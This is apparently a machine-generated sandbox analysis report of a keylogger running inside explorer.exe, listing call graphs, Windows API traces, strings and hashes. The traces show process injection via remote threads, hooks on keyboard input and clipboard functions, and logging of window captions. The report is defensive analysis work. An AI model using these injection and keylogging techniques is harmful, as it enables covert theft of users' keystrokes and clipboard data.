                                                                                                                                                                                                              callgraph 0 Function_027925F1 1 Function_027929E9 2 Function_02792569 3 Function_027929EB 33 Function_02792724 3->33 4 Function_02791FEA 5 Function_0279276D 6 Function_02799AE0 7 Function_02791E66 21 Function_02791CBF 7->21 8 Function_02791ED8 9 Function_0279275A 10 Function_0279255C 11 Function_027917DC 40 Function_02792A09 11->40 12 Function_027926C9 13 Function_027924CC 14 Function_02792841 15 Function_027916B9 15->3 15->11 16 Function_02791F3A 16->4 16->7 17 Function_027929BD 16->17 24 Function_02791FB4 16->24 18 Function_02791BBD 19 Function_0279243D 19->40 42 Function_0279298A 19->42 20 Function_027918BF 20->18 20->33 36 Function_02791B26 20->36 22 Function_0279293E 22->3 22->40 23 Function_02791533 37 Function_02791E26 24->37 25 Function_0279162B 25->15 26 Function_0279182D 26->3 27 Function_027929AE 26->27 34 Function_027925A4 26->34 26->40 44 Function_0279200D 26->44 28 Function_027912AE 28->2 28->3 28->10 28->14 28->17 28->27 28->40 29 Function_027926AE 30 Function_027913AE 30->0 30->3 30->16 38 Function_02792799 30->38 30->40 41 Function_02791E89 30->41 31 Function_027920A1 31->3 31->13 31->17 31->19 31->40 31->42 43 Function_0279288D 31->43 46 Function_0279240F 31->46 32 Function_027910A5 32->3 32->5 32->9 32->12 32->14 32->20 32->28 32->29 32->33 32->40 32->43 45 Function_0279268F 32->45 34->40 35 Function_02793627 37->21 39 Function_02791016 39->3 39->5 39->9 39->12 39->14 39->20 39->28 39->29 39->30 39->32 39->33 39->40 39->43 39->45 41->4 41->8 41->33 44->3 44->31 44->40 46->14 47 Function_02791581 47->3 47->15 47->22 47->33 47->40 48 Function_02791000 48->39

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02792724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,027929F3,-00000001,0279128C), ref: 02792731
                                                                                                                                                                                                                • Part of subcall function 02792A09: GetProcessHeap.KERNEL32(00000008,0000A000,027910BF), ref: 02792A0C
                                                                                                                                                                                                                • Part of subcall function 02792A09: RtlAllocateHeap.NTDLL(00000000), ref: 02792A13
                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 02791038
                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0279106C
                                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 02791075
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,02791010), ref: 0279107B
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 027910E7
                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 02791155
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02791160
                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,?), ref: 0279117F
                                                                                                                                                                                                              • CharLowerA.USER32(?), ref: 02791199
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,explorer.exe), ref: 027911B5
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02791212
                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 0279126C
                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 0279127F
                                                                                                                                                                                                              • Sleep.KERNELBASE(000003E8), ref: 0279129F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000001B.00000002.2893317519.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MemoryMove$HeapProcessProcess32lstrcmpi$AllocateCharCloseCreateCurrentFirstHandleLowerNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtualwsprintf
                                                                                                                                                                                                              • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                                                                                                                                                                                              • API String ID: 3206029838-2805246637
                                                                                                                                                                                                              • Opcode ID: a2089eaaf61b955d9e4909b5383049f9b8fa406adae4e2ee3a3a20a3594b589c
                                                                                                                                                                                                              • Instruction ID: 98b8a7bc2793fc750c27cbc042dd1ccf6cd7e8d422abfc5a5d9875acfe815ef8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2089eaaf61b955d9e4909b5383049f9b8fa406adae4e2ee3a3a20a3594b589c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7514D30A443026FDF15FF78F84CA3B37AAEB45744F804928ED1A97291EB3199168F61

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02792A09: GetProcessHeap.KERNEL32(00000008,0000A000,027910BF), ref: 02792A0C
                                                                                                                                                                                                                • Part of subcall function 02792A09: RtlAllocateHeap.NTDLL(00000000), ref: 02792A13
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 027910E7
                                                                                                                                                                                                                • Part of subcall function 0279276D: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 02792777
                                                                                                                                                                                                                • Part of subcall function 0279276D: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,027910FE), ref: 02792789
                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 02791155
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02791160
                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,?), ref: 0279117F
                                                                                                                                                                                                              • CharLowerA.USER32(?), ref: 02791199
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,explorer.exe), ref: 027911B5
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02791212
                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 0279126C
                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 0279127F
                                                                                                                                                                                                              • Sleep.KERNELBASE(000003E8), ref: 0279129F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000001B.00000002.2893317519.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileHeapProcess32lstrcmpi$AllocateCharCloseCreateFirstHandleLowerMappingMemoryMoveNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                                                                                                                                                                                                              • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                                                                                                                                                                                              • API String ID: 3018447944-2805246637
                                                                                                                                                                                                              • Opcode ID: a2ae4d14305c6b3828b44ceee19b656f45681dde3a7af6d37893d85954a71d1c
                                                                                                                                                                                                              • Instruction ID: 9704ada9698f62ed8fe11299d1cda2175e3e5fbd9159c9199761e33925501ad3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2ae4d14305c6b3828b44ceee19b656f45681dde3a7af6d37893d85954a71d1c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD410B30B443016FDF15FF74A888D3F77ABEB85744F804A28ED5A97291EB3099168E61

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 122 2799ae0-2799ae5 123 2799aeb-2799af8 122->123 124 2799cad 122->124 125 2799b0a-2799b0f 123->125 124->124 126 2799b11 125->126 127 2799b00-2799b05 126->127 128 2799b13 126->128 129 2799b06-2799b08 127->129 130 2799b18-2799b1a 128->130 129->125 129->126 131 2799b1c-2799b21 130->131 132 2799b23-2799b27 130->132 131->132 132->130 133 2799b29 132->133 134 2799b2b-2799b32 133->134 135 2799b34-2799b39 133->135 134->130 134->135 136 2799b48-2799b4a 135->136 137 2799b3b-2799b44 135->137 140 2799b4c-2799b51 136->140 141 2799b53-2799b57 136->141 138 2799bba-2799bbd 137->138 139 2799b46 137->139 142 2799bc2-2799bc5 138->142 139->136 140->141 143 2799b59-2799b5e 141->143 144 2799b60-2799b62 141->144 145 2799bc7-2799bc9 142->145 143->144 146 2799b84-2799b93 144->146 147 2799b64 144->147 145->142 150 2799bcb-2799bce 145->150 148 2799b95-2799b9c 146->148 149 2799ba4-2799bb1 146->149 151 2799b65-2799b67 147->151 148->148 152 2799b9e 148->152 149->149 153 2799bb3-2799bb5 149->153 150->142 154 2799bd0-2799bec 150->154 155 2799b69-2799b6e 151->155 156 2799b70-2799b74 151->156 152->129 153->129 154->145 158 2799bee 154->158 155->156 156->151 157 2799b76 156->157 159 2799b78-2799b7f 157->159 160 2799b81 157->160 161 2799bf4-2799bf8 158->161 159->151 159->160 160->146 162 2799bfa-2799c10 LoadLibraryA 161->162 163 2799c3f-2799c42 161->163 164 2799c11-2799c16 162->164 165 2799c45-2799c4c 163->165 164->161 166 2799c18-2799c1a 164->166 167 2799c4e-2799c50 165->167 168 2799c70-2799ca0 VirtualProtect * 2 165->168 169 2799c1c-2799c22 166->169 170 2799c23-2799c30 GetProcAddress 166->170 171 2799c63-2799c6e 167->171 172 2799c52-2799c61 167->172 173 2799ca4-2799ca8 168->173 169->170 174 2799c39-2799c3c 170->174 175 2799c32-2799c37 170->175 171->172 172->165 173->173 176 2799caa 173->176 175->164 176->124
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000001B.00000002.2893317519.0000000002798000.00000040.80000000.00040000.00000000.sdmp, Offset: 02798000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2798000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: a16c5de751307a603ae859d14b1ce8283effed405b237575b599a8b1dfd681ba
                                                                                                                                                                                                              • Instruction ID: 16342d75137f514ddb1eb3210b77ac0bc61c1df98adc151d65ecb3d6015ba27b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a16c5de751307a603ae859d14b1ce8283effed405b237575b599a8b1dfd681ba
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FB51F7B1A55752DAFF218A78EC807B4B7A4EB42234B18073DC6E6C73C6E7985846C760

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 177 279276d-279277f OpenFileMappingA 178 2792781-2792791 MapViewOfFile 177->178 179 2792794-2792798 177->179 178->179
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 02792777
                                                                                                                                                                                                              • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,027910FE), ref: 02792789
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000001B.00000002.2893317519.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$MappingOpenView
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3439327939-0
                                                                                                                                                                                                              • Opcode ID: 1b2d9b44950309e1744b6158a7de88138b546fe2b74e380630400635ebabb1e4
                                                                                                                                                                                                              • Instruction ID: 32e35faddd411c2639c781996b8b790561fd464d15123e1813967184cc191365
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b2d9b44950309e1744b6158a7de88138b546fe2b74e380630400635ebabb1e4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 22D01732B41332BBE7345A7B6C0DF83AE9EDF86AE1B014025B90DD2140D6608821C2F0

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 180 2792a09-2792a19 GetProcessHeap RtlAllocateHeap
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,0000A000,027910BF), ref: 02792A0C
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02792A13
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000001B.00000002.2893317519.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocateProcess
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1357844191-0
                                                                                                                                                                                                              • Opcode ID: bce5dc6224839a1bce330235b5929ba23950a799d81f2e3660b066f59723f804
                                                                                                                                                                                                              • Instruction ID: 41831169f6367bf9ca5b82d060843478cf5f9a78590e25502944b3414502ef5e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bce5dc6224839a1bce330235b5929ba23950a799d81f2e3660b066f59723f804
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2EA002B1E903046BDE5457A8A90EF167659A744701F00C9847256C50409D7554558721

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 181 27929bd-27929cd VirtualAlloc
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,00040744,00003000,00000040,027912D9,00000000,00000000,?,00000001), ref: 027929C7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000001B.00000002.2893317519.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                                              • Opcode ID: b9b17012cf5edb54b0055a83aa46beef0ee7b2b62bd7cb0f1f6667c850cbd8e5
                                                                                                                                                                                                              • Instruction ID: 6d8d5125dda783bb939e0685f8e9cc2ea5b86f7397ac94d0162b79e18fa6a2de
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b9b17012cf5edb54b0055a83aa46beef0ee7b2b62bd7cb0f1f6667c850cbd8e5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6CA002B4FD5300BAFD6997569D1FF152A199740F02F108585B30A7C1C056F4B511853D

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 182 27929ae-27929bc VirtualFree
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,027913A4), ref: 027929B6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000001B.00000002.2893317519.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1263568516-0
                                                                                                                                                                                                              • Opcode ID: bfaa2aa45f872a01bedf9f312c0ee8d648e4d1b4d377e7ee50a57ea24b08d396
                                                                                                                                                                                                              • Instruction ID: 6a108189672d07996fc6c4c5f547d2cbe2638716e31104462601e5350a73c224
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bfaa2aa45f872a01bedf9f312c0ee8d648e4d1b4d377e7ee50a57ea24b08d396
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 51A00270FD070076ED7457245D0BF0566556740B02F2089847255A80C049B5E4598B18

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02792724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,027929F3,-00000001,0279128C), ref: 02792731
                                                                                                                                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000000,00000001), ref: 027918F4
                                                                                                                                                                                                              • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 0279192F
                                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 027919BF
                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,02793638,00000016), ref: 027919E6
                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 02791A0E
                                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 02791A1E
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02791A38
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 02791A40
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02791A4E
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02791A55
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 02791A6B
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 02791A72
                                                                                                                                                                                                              • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02791A88
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02791AB2
                                                                                                                                                                                                              • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02791AC5
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02791ACC
                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02791AD3
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02791AE7
                                                                                                                                                                                                              • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02791AFE
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02791B0B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02791B11
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02791B17
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 02791B1A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000001B.00000002.2893317519.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                                                                                                                                                              • String ID: atan$ntdll$opera_shared_counter
                                                                                                                                                                                                              • API String ID: 1066286714-2737717697
                                                                                                                                                                                                              • Opcode ID: 7f67a9658be4e37c83d5b42ea188674b0f29b38861c2148af5338aeebf5e11df
                                                                                                                                                                                                              • Instruction ID: 6fac3e75e00bdcb238fa11f3763062cae31ed3f2abb4aa9b5595a0a13046b00e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f67a9658be4e37c83d5b42ea188674b0f29b38861c2148af5338aeebf5e11df
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA61AF71A44305AFDB10DF29EC88E6B7BEEEB48754F404959F949D3240D770D815CB62

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 027927B5
                                                                                                                                                                                                              • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 027927CD
                                                                                                                                                                                                              • lstrlen.KERNEL32(?,00000000), ref: 027927D5
                                                                                                                                                                                                              • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 027927E0
                                                                                                                                                                                                              • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 027927FA
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 02792811
                                                                                                                                                                                                              • CryptDestroyHash.ADVAPI32(?), ref: 0279282A
                                                                                                                                                                                                              • CryptReleaseContext.ADVAPI32(?,00000000), ref: 02792834
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000001B.00000002.2893317519.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                                                                                                                                                              • String ID: %02X
                                                                                                                                                                                                              • API String ID: 3341110664-436463671
                                                                                                                                                                                                              • Opcode ID: 2d134f160536a142c490080cecd4a6f7e33142ade4019128278f416f7baa20e3
                                                                                                                                                                                                              • Instruction ID: 1c4201458772d9e68e2a04fc23c42426ac5cf79b0c7674c4cf405e8b4eea21d2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2d134f160536a142c490080cecd4a6f7e33142ade4019128278f416f7baa20e3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA116D71D40208BFEB119B99EC89EEEBFBDEB48305F1084A5FA05E2110D7314E22DB60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetKeyboardState.USER32(?), ref: 02791652
                                                                                                                                                                                                              • ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 0279167A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000001B.00000002.2893317519.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: KeyboardStateUnicode
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3453085656-3916222277
                                                                                                                                                                                                              • Opcode ID: 6bd5787b7224e9114a3a6405a39d8d2d4a022a7eb66eb1c9d3ed029253217984
                                                                                                                                                                                                              • Instruction ID: ebed3622cd00f49de2b542d6a14c7cbf28048d05c1a6180364f6becb9699e3a3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6bd5787b7224e9114a3a6405a39d8d2d4a022a7eb66eb1c9d3ed029253217984
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 29019232D4071A9BDF34CE54E945BFB73BCAF45B04F88845AE909E2140DF30E565CAA1

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(02795013,0000001C), ref: 027913C8
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(027913AE,?,0000001C), ref: 027913DA
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 0279140B
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000004), ref: 0279141C
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 02791433
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02791448
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0279144E
                                                                                                                                                                                                              • RtlInitializeCriticalSection.NTDLL(0279582C), ref: 02791465
                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 02791489
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(user32.dll,TranslateMessage), ref: 027914A6
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 027914AF
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(user32.dll,GetClipboardData), ref: 027914D0
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 027914D3
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 027914F1
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_0000082D,00000000,00000000,00000000), ref: 0279150D
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02791514
                                                                                                                                                                                                              • RtlExitUserThread.NTDLL(00000000), ref: 0279152A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000001B.00000002.2893317519.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleModule$AddressCreateProcThread$CloseCriticalCurrentErrorExitFileInitializeLastMemoryMutexNameProcessQuerySectionSleepUserVirtualZerowsprintf
                                                                                                                                                                                                              • String ID: %s%d%d%d$GetClipboardData$TranslateMessage$kernel32.dll$user32.dll
                                                                                                                                                                                                              • API String ID: 3628807430-1779906909
                                                                                                                                                                                                              • Opcode ID: ce19153dfc0de67f722fde1044a41740961121862a62f74b0f8b675de824ae8f
                                                                                                                                                                                                              • Instruction ID: eface2d49c5b20603d27a2016dd4ce3bdb253fa99e12ecd0e2028bae7c3ea505
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce19153dfc0de67f722fde1044a41740961121862a62f74b0f8b675de824ae8f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0241C670E80315BBEF11BB79FC0DE5B3FAEEB457557418858F90A86240DB759822CBA0

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlEnterCriticalSection.NTDLL(0279582C), ref: 027916C4
                                                                                                                                                                                                              • lstrlenW.KERNEL32 ref: 027916DB
                                                                                                                                                                                                              • lstrlenW.KERNEL32 ref: 027916F3
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 02791743
                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 0279174E
                                                                                                                                                                                                              • GetWindowTextW.USER32(00000000,02795850,00000800), ref: 02791767
                                                                                                                                                                                                              • GetClassNameW.USER32(00000000,02795850,00000800), ref: 02791774
                                                                                                                                                                                                              • lstrcmpW.KERNEL32(02795020,02795850), ref: 02791781
                                                                                                                                                                                                              • lstrcpyW.KERNEL32(02795020,02795850), ref: 0279178D
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 027917AD
                                                                                                                                                                                                              • lstrcatW.KERNEL32 ref: 027917C6
                                                                                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(0279582C), ref: 027917D3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000001B.00000002.2893317519.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSectionWindowlstrlenwsprintf$ClassEnterForegroundLeaveNameTextlstrcatlstrcmplstrcpy
                                                                                                                                                                                                              • String ID: Clipboard -> $ New Window Caption -> $%s%s%s$%s%s%s%s
                                                                                                                                                                                                              • API String ID: 2651329914-3371406555
                                                                                                                                                                                                              • Opcode ID: dbdb499a965e773389ae33df831a58dd7f37f3a5fd1137fc383054abcf9e7b39
                                                                                                                                                                                                              • Instruction ID: ae1bc7bb129d4341e4f2c2231fdae48db2df3853fa1738b5a643179bcf544f45
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dbdb499a965e773389ae33df831a58dd7f37f3a5fd1137fc383054abcf9e7b39
